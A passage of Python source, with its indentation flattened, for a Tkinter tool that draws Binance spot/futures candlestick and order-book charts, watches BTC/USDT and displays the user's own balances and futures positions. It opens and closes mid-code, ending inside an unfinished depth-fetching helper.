y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
app.graph_Cn.coords(GLO_S[GLO_S_Ci],800,y_liq,900,y_liq)
app.graph_Cn.coords(GLO_S_txt[GLO_S_Ci],800,y_liq)
app.graph_Cn.itemconfigure(GLO_S_txt[GLO_S_Ci],text='Ордер SHORT\n'+str(TO_It[2]))
GLO_S_Ci +=1
if len(GLO_L) > GLO_L_Ci-1:
for nm in range (int(GLO_L_Ci),len(GLO_L)):
app.graph_Cn.coords(GLO_L[nm],0,0,0,0)
app.graph_Cn.coords(GLO_L_txt[nm],0,0)
app.graph_Cn.itemconfigure(GLO_L_txt[nm],text='')
if len(GLO_S) > GLO_S_Ci-1:
for nm in range (int(GLO_S_Ci),len(GLO_S)):
app.graph_Cn.coords(GLO_S[nm],0,0,0,0)
app.graph_Cn.coords(GLO_S_txt[nm],0,0)
app.graph_Cn.itemconfigure(GLO_S_txt[nm],text='')
#Order Book Graph
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
if float(mylist4[m][1])>0:
points=[]
x0 = 180
#y0 = grMd + grSt/2 - ((float(mylist4[m][0])-yI0)/prSt)* grSt
y0 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
if m==0:
y0 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* grSt
#print(mylist4[m][0],x0, y0, x1, y1)
app.graph_Cn.coords(GAP, -500, y0, 800, y0)
app.graph_Cn.coords(GAPt, 805, y0)
if len(PnL_Pos_L) > 0 and len(PnL_Pos_S) > 0:
sTmp = '\n' + 'Цена: ' + str(float(mylist4[m][0]))
else:
sTmp = 'Цена: ' + str(float(mylist4[m][0]))
if len(PnL_Pos_L) > 0:
sTmp += '\n'+'Long PnL: ' + str(PnL_Pos_L)
if len(PnL_Pos_S) > 0:
sTmp += '\n'+'Short PnL: ' + str(PnL_Pos_S)
app.graph_Cn.itemconfigure(GAPt,text=sTmp)
#______________Candlestick chart timer comparing SPOT and FUTURES for the pair
class Timer_Candle_Summ:
def __init__(self):
global TE_CndSm
global ss
global yI
global Lo
while True:
if PS1 == True:
sys_msg = ' Свечной график сравнения SPOT/FUTURES' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_CndSm = True
break
if should_run_S:
for i in range(400):
if not should_run_S:
sys_msg = ' Свечной график сравнения SPOT/FUTURES' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_S:
if i==0:
sys_msg = ' Свечной график сравнения SPOT/FUTURES ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
TE_CndSm = False
if i > 0:
time.sleep(0.5)
myTup_DSp = ('depth', bot.depth(symbol=grSmb, limit=50)) #tupl
mylist3_Sp = myTup_DSp[1] #dict
mylist4_Sp=mylist3_Sp['bids'] #list
mylist5_Sp=mylist3_Sp['asks'] #list
myTup_DFt = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=500)) #tupl
mylist3_Ft = myTup_DFt[1] #dict
mylist4_Ft=mylist3_Ft['bids'] #list
mylist5_Ft=mylist3_Ft['asks'] #list
#print(myTup11[1])
#print('trades', bot.trades(symbol='BNBUSDT', limit=1))
#If one participant bought and another sold, is that a buy or a sell?
#Answer: in the binance trade history, trades with isBuyerMaker == false are highlighted green,
#and those with true - magenta
#sss41 = "BNBUSDT - trades"
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='5m', limit=288)) #Tupl
#print (myTup131[1])
myDicGr1Sp = myTupSpK[1] #dict
#print(myDicGr1)
yI0=float(myDicGr1Sp[287][1])
#print (myDicGr1[1][1])
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='5m', limit=288)) #tupl
#print(myTup12)
myDicGr1Ft = myTupFtK[1]
#print(myDicGr1)
yI0=float(myDicGr1Ft[287][1])
#print (yI0)
if i==0:
BnMt = bot.futuresOrders(limit=1)
#print (BnMt)
Lo = int(BnMt[0]['orderId'])
#print (Lo)
yI=100
app.graph_Sm.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
ss = ""
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(900,grMd)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
GAP_Sp = app.graph_Sm.create_line(points,fill="blue",width=1,dash=(4,2))
#print(yI0,grMd,prSt)
if prSt >= 0.1:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue")
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue")
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.3f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.3f" % (yI0),fill="blue")
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.4f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.4f" % (yI0),fill="blue")
elif prSt < 0.0001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.8f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.8f" % (yI0),fill="blue")
yp=1180
ypi=0
while yp > -500:
points=[]
yp = 1180 - ypi*12*4#12*4=1hour
#print(yp)
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1,dash=(4,2))
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
tm=TT0/1000+36000-ypi*3600
tm1 = datetime.datetime.fromtimestamp(tm)
tmm=tm1.strftime("%H:%M")
app.graph_Tb.create_text(1180 - ypi*48,10,text=tmm)
app.graph_Td.create_text(1180 - ypi*48,10,text=tmm)
ypi += 1
yp=grMd
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0-ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0-ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0-ypi*(yI0/100)))
ypi += 1
yp=grMd
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp)
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0+ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0+ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0+ypi*(yI0/100)))
ypi += 1
#print (len(myDicGr1))
for mm in range(len(myDicGr1Sp)):
myDicGr1TT = myDicGr1Sp[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
xxp = 700 + ((((xx - TT0)/1000)+150)/300)*8
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
# print (xxp,yyp1,yyp2,yyp3,yyp4)
if xxp > 1000:
app.graph_Sm.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "green"
else:
flc="red"
app.graph_Sm.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
#print (len(myDicGr1))
for mm in range(len(myDicGr1Ft)):
myDicGr1TT = myDicGr1Ft[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
xxp = 696 + ((((xx - TT0)/1000)+150)/300)*8
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
# print (xxp,yyp1,yyp2,yyp3,yyp4)
if xxp > 1000:
app.graph_Sm.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "black"
else:
flc="black"
app.graph_Sm.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
#Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5_Ft))):
if float(mylist5_Ft[m][1])>(grOW/20):
points=[]
x0 = 180
y0 = grMd - ((float(mylist5_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5_Ft[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=(grSt/10))
if float(mylist4_Ft[m][1])>(grOW/20):
points=[]
x0 = 180
y0 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4_Ft[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=(grSt/10))
if m==0:
y0 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* grSt
#print(mylist4[m][0],x0, y0, x1, y1)
app.graph_Sm.coords(GAP_Sp, -500, y0, 800, y0)
app.graph_Sm.itemconfigure(GAP_SpT,text=float(mylist4_Ft[m][0]))
#______________BTC/USDT watcher timer
class Timer_BTCUSDT:
def __init__(self):
global TE_BU
while True:
if PS_BU == False:
sys_msg = ' Наблюдатель BTC/USDT остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_BU = True
break
if should_run_BU:
for i in range(400):
if not should_run_BU:
#print('Stopped...')
ss_BU = 'Stopped...' + '\n BTC/USDT watcher'
app.label_BU.config(text = ss_BU)
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='SystemButtonText'
sys_msg = ' Наблюдатель BTC/USDT будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_BU:
if i==0:
sys_msg = ' Наблюдатель BTC/USDT запущен.'
app.Sys_Msg(text1=sys_msg)
TE_BU = False
if i > 0:
time.sleep(0.5)
myTupSpK =('klines', bot.klines(symbol='BTCUSDT', interval='1m', limit=5)) #Tupl
#print (myTup131[1])
myDicGr1Sp = myTupSpK[1] #dict
#print(myDicGr1)
yI_Sp_0=0
yI_Sp_1=0
for ii in range(len(myDicGr1Sp)):
if ii == 0:
yI_Sp_1=float(myDicGr1Sp[ii][3])
if float(myDicGr1Sp[ii][2])>yI_Sp_0:
yI_Sp_0=float(myDicGr1Sp[ii][2]) #High
if float(myDicGr1Sp[ii][3])<yI_Sp_1:
yI_Sp_1=float(myDicGr1Sp[ii][3]) #Low
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1m', limit=5)) #tupl
#print(myTup12)
myDicGr1Ft = myTupFtK[1]
#print(myDicGr1)
yI_Ft_0=0
yI_Ft_1=1
for ii in range(len(myDicGr1Ft)):
if ii == 0:
yI_Ft_1=float(myDicGr1Ft[ii][3])
if float(myDicGr1Ft[ii][2])>yI_Ft_0:
yI_Ft_0=float(myDicGr1Ft[ii][2]) #High
if float(myDicGr1Ft[ii][3])<yI_Ft_1:
yI_Ft_1=float(myDicGr1Ft[ii][3]) #Low
ss_BU = 'SPOT: xx%, FUTURES xx%'
myTup_DSp = ('depth', bot.depth(symbol='BTCUSDT', limit=5)) #tupl
#print('SPOT D',myTup_DSp)
mylist3_Sp = myTup_DSp[1] #dict
mylist4_Sp=mylist3_Sp['bids'] #list
myTup_DFt = ('FutDepth', bot.futuresDepth(symbol='BTCUSDT', limit=5)) #tupl
#print('FT D',myTup_DFt)
mylist3_Ft = myTup_DFt[1] #dict
mylist4_Ft=mylist3_Ft['bids'] #list
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%H:%M:%S] ")
xx1 = (float(mylist4_Sp[0][0])-yI_Sp_0)/(float(mylist4_Sp[0][0])/100)
ss_BU = time_local_str + 'SPOT: ' + "%.2f" % (xx1) + '%, '
xx2 = (float(mylist4_Ft[0][0])-yI_Ft_0)/(float(mylist4_Ft[0][0])/100)
ss_BU += 'FRS: ' + "%.2f" % (xx2) + '%, '
xx3 = (float(mylist4_Sp[0][0])-yI_Sp_1)/(float(mylist4_Sp[0][0])/100)
ss_BU += '\n' + time_local_str + 'SPOT: ' + "%.2f" % (xx3) + '%, '
xx4 = (float(mylist4_Ft[0][0])-yI_Ft_1)/(float(mylist4_Ft[0][0])/100)
ss_BU += 'FRS: ' + "%.2f" % (xx4) + '%, '
app.label_BU.config(text = ss_BU)
if (xx3<0 and xx4<0) or ((xx1<-0.25 and xx2<-0.25) and (-xx1>xx3 and -xx2>xx4)):
if app.label_BU['bg']=='SystemButtonFace':
app.label_BU['bg']='pink'
app.label_BU['fg']='SystemButtonText'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='red'
elif (xx1>0 and xx2>0) or ((xx3>0.25 and xx4>0.25)and (xx3>(-xx1) and xx4>(-xx2))):
if app.label_BU['bg']=='SystemButtonFace':
app.label_BU['bg']='lightgreen'
app.label_BU['fg']='SystemButtonText'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='green'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='SystemButtonText'
#______________Account balances watcher timer
class Timer_AccBlns:
def __init__(self):
global TE_AB
i=0
while True:
if PS_AB == False:
sys_msg = ' Наблюдатель балансов остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_AB = True
break
if should_run_AB:
#for i in range(400):
if not should_run_AB:
#print('Stopped...')
sys_msg = ' Наблюдатель балансов будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_AB:
if i==0:
sys_msg = ' Наблюдатель балансов запущен.'
app.Sys_Msg(text1=sys_msg)
TE_AB = False
if i > 0:
time.sleep(0.5)
BnAcc = bot.account()
BnAcc10 = BnAcc['balances']
ss = 'SPOT баланс: ' #0 USDT'
#print(BnAcc10)
for mm in range(len(BnAcc10)):
BnAcc101 = BnAcc10[mm]
if BnAcc101['asset'] =='USDT':
#print (BnAcc10[mm])
ss += str(BnAcc101['asset']) + "\nДоступно: " + str(BnAcc101['free']) + "USDT.\nНе доступно: " + str(BnAcc101['locked']) + ' USDT.'
app.label_BlnsSpt.config(text = ss)
BnFAcc = bot.futuresBalance()
#print(BnFAcc)
ss = 'FUTURE баланс: ' #0 USDT'
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if BnFAcc1['asset'] == 'USDT':
#print(BnFAcc[mm])
ss += str(BnFAcc1['asset']) + '.'
ss += "\nВсего: " + str(BnFAcc1['balance']) + ".\nДоступно: " + str(BnFAcc1['withdrawAvailable'])
app.label_2.config(text = ss)
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
ss = 'FUTURES позиции:\n'
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['totalUnrealizedProfit']
ss += 'PnL: ' + str(BnFAcc1) + ' USDT'
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str_H=time_local_time.strftime("%H")
ss += '\n'
if float(time_local_str_H)>=11 and float(time_local_str_H)<=19:
ss += 'Лондон '
if (float(time_local_str_H)>=16 and float(time_local_str_H)<=23) or float(time_local_str_H)==0:
ss += 'Нью-Йорк '
if float(time_local_str_H)>=0 and float(time_local_str_H)<=8: #1..9
ss += 'Сидней '
if float(time_local_str_H)>=2 and float(time_local_str_H)<=10: #3..11
ss += 'Токио '
app.label_PnL.config(text = ss)
BnFAcc=bot.userPositionInfo()
TrSc_P = app.Tree_Pos_VScrl.get()
TrSc_P=app.Tree_Pos.yview()
#print(TrSc_P)
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
l = TP_CC+1
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
#print(BnFAcc1)
if len(BnFAcc1)>0:
TP_SCh = True
if TP_CC > 0:
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Pos.item(nn)["values"]
if TP_It[1] == str(BnFAcc1['symbol']) and TP_It[0] == str(BnFAcc1['positionSide']):
app.Tree_Pos.item(nn, values=(str(BnFAcc1['positionSide']),str(BnFAcc1['symbol']),str(BnFAcc1['leverage']),str(BnFAcc1['unRealizedProfit']),
str(BnFAcc1['entryPrice']),str(BnFAcc1['markPrice']),str(BnFAcc1['liquidationPrice']),
str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))))
TP_SCh = False
#print(TP_It[0])
if TP_SCh == True and float(BnFAcc1['positionAmt']) != 0:
#print(TP_It)
#print(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']))
app.Tree_Pos.insert(parent='',index='end',iid=l,text='',values=(str(BnFAcc1['positionSide']),str(BnFAcc1['symbol']),str(BnFAcc1['leverage']),str(BnFAcc1['unRealizedProfit']),
str(BnFAcc1['entryPrice']),str(BnFAcc1['markPrice']),str(BnFAcc1['liquidationPrice']),
str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))))
l +=1
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
TP_Tpl_Tmp=[]
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Pos.item(nn)["values"]
TP_Tpl_Tmp.append(app.Tree_Pos.item(nn)["values"])
#print(TP_Tpl_Tmp[nn-1])
#print(len(app.Tree_Pos.get_children()))
kk=0
nm=False
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Pos.item(nn)["values"]
if float(TP_It[3]) == 0 and float(TP_It[4]) == 0 and kk<=len(TP_Tpl_Tmp):
nm=True
km=False
for mm in range(kk,len(TP_Tpl_Tmp)):
#print(mm)
if float(TP_Tpl_Tmp[mm][3])!=0 and float(TP_Tpl_Tmp[mm][4])!=0 and km==False:
app.Tree_Pos.item(nn, values=(TP_Tpl_Tmp[mm][0],TP_Tpl_Tmp[mm][1],TP_Tpl_Tmp[mm][2],TP_Tpl_Tmp[mm][3],TP_Tpl_Tmp[mm][4],TP_Tpl_Tmp[mm][5],TP_Tpl_Tmp[mm][6],TP_Tpl_Tmp[mm][7]))
kk=mm+1
#print(nn,kk,mm)
km=True
if nm==True and km==False:
kk=len(TP_Tpl_Tmp)+1
else:
#print(nn,kk)
if nm==True and kk<TP_CC:
app.Tree_Pos.item(nn, values=(TP_Tpl_Tmp[kk][0],TP_Tpl_Tmp[kk][1],TP_Tpl_Tmp[kk][2],TP_Tpl_Tmp[kk][3],TP_Tpl_Tmp[kk][4],TP_Tpl_Tmp[kk][5],TP_Tpl_Tmp[kk][6],TP_Tpl_Tmp[kk][7]))
kk +=1
if kk>len(TP_Tpl_Tmp) and nn<=TP_CC+1:
app.Tree_Pos.delete(nn)
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
for nn in range(1,TP_CC+1):
app.Tree_Pos.item(nn, tags=())
TP_Tpl_Tmp=app.Tree_Pos.item(nn)["values"]
if float(TP_Tpl_Tmp[3]) > 0:
app.Tree_Pos.item(nn,tags=('plus'))
elif float(TP_Tpl_Tmp[3]) <0:
app.Tree_Pos.item(nn,tags=('minus'))
app.Tree_Pos.tag_configure('plus', background='#d6f8d6')
app.Tree_Pos.tag_configure('minus', background='#fce7e7')
app.Tree_Pos.yview_moveto((TrSc_P[0]))
#print(TrSc_P[0])
if i == 0:
i = 1
#______________Order book chart timer
class Timer_OrdTmr:
def __init__(self):
global TE_OrdTmr
while True:
if PS_OT == False:
sys_msg = ' График ордеров в стакане ' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_OrdTmr = True
break
if should_run_OT:
for i in range(400):
if not should_run_OT:
sys_msg = ' График ордеров в стакане ' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_OT:
if i==0:
sys_msg = ' График ордеров в стакане ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
TE_OrdTmr = False
if i > 0:
time.sleep(0.5)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=1000)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2; LIMIT=100 WEIGHT = 5;LIMIT=500 WEIGHT = 10;LIMIT=1000 WEIGHT = 20)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=1000)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
if (float(mylist5[m][1])*float(mylist5[m][0]))>50000:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=(grSt/10))
for m in range (int(len(mylist4))):
if float(mylist4[m][1])>0:
if (float(mylist4[m][1])*float(mylist4[m][0]))>50000:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=(grSt/10))
    #______________Timer for the zoomed order-book depth chart
class Timer_Zoom:
def __init__(self):
global ss
global yI
global Lo
global yI0Zm
global TE_Zm
while True:
if Ord_Zm == False:
sys_msg = ' Zoom ордеров ' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_Zm = True
break
if should_run_OZ:
for i in range(400):
if not should_run_OZ:
sys_msg = ' Zoom ордеров ' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_OZ:
if i==0:
TE_Zm = False
sys_msg = ' Zoom ордеров ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
if i > 0:
time.sleep(0.01)
                            #Browser link for a quick look: https://api.binance.com/api/v1/depth?symbol=ETHBTC
                            #limit - number of records returned, from 5 to 1000 (default 100).
                            #Allowed values: 5, 10, 20, 50, 100, 500, 1000.
                            #0 can also be passed, but it may return a very large amount of data.
                            #The request weight depends on limit: for limits from 5 to 100 the weight is 1,
                            #for 500 it is 5, and for 1000 it is 10 (see the fetch_depth sketch after this class).
#print (grSmb)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=20)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=20)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#print (mylist4)
if i==0:
yI0Zm=float(mylist4[19][0])
grMd = grH/2
grSt = grZm/(yI0Zm*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
grStZ=1000/40
#Order Book Graph
app.graph_Zm.delete("all")
yI0Zm=float(mylist4[0][0])
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0Zm)/prSt)* grStZ
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/200))*10
y1 = grMd - ((float(mylist5[m][0])-yI0Zm)/prSt)* grStZ
pp=(x1,y1)
points.append(pp)
app.graph_Zm.create_line(points,fill="pink",width=grStZ)
if prSt >= 0.1:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist5[m][0]))
elif 0.1 > prSt >= 0.01:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist5[m][0]))
elif 0.01 > prSt >= 0.001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.3f" % float(mylist5[m][0]))
elif 0.001 > prSt >= 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.4f" % float(mylist5[m][0]))
elif prSt < 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.8f" % float(mylist5[m][0]))
if float(mylist4[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-yI0Zm)/prSt)* grStZ
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/200))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0Zm)/prSt)* grStZ
pp=(x1,y1)
points.append(pp)
app.graph_Zm.create_line(points,fill="lightgreen",width=grStZ)
if prSt >= 0.1:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist4[m][0]))
elif 0.1 > prSt >= 0.01:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist4[m][0]))
elif 0.01 > prSt >= 0.001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.3f" % float(mylist4[m][0]))
elif 0.001 > prSt >= 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.4f" % float(mylist4[m][0]))
elif prSt < 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.8f" % float(mylist4[m][0]))
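#__Illustrative sketch (not wired into the timers): fetch the order book for the current
#__market type and return (bids, asks), mirroring the SPOT/FUTURES branch used in
#__Timer_OrdTmr and Timer_Zoom above. The allowed `limit` values follow the depth endpoint
#__comment above; this helper itself is an assumption, not part of the existing bot API.
def fetch_depth(symbol, limit=20):
    allowed = (5, 10, 20, 50, 100, 500, 1000)
    if limit not in allowed:
        raise ValueError('limit must be one of %s' % (allowed,))
    if MS == 'SPOT':
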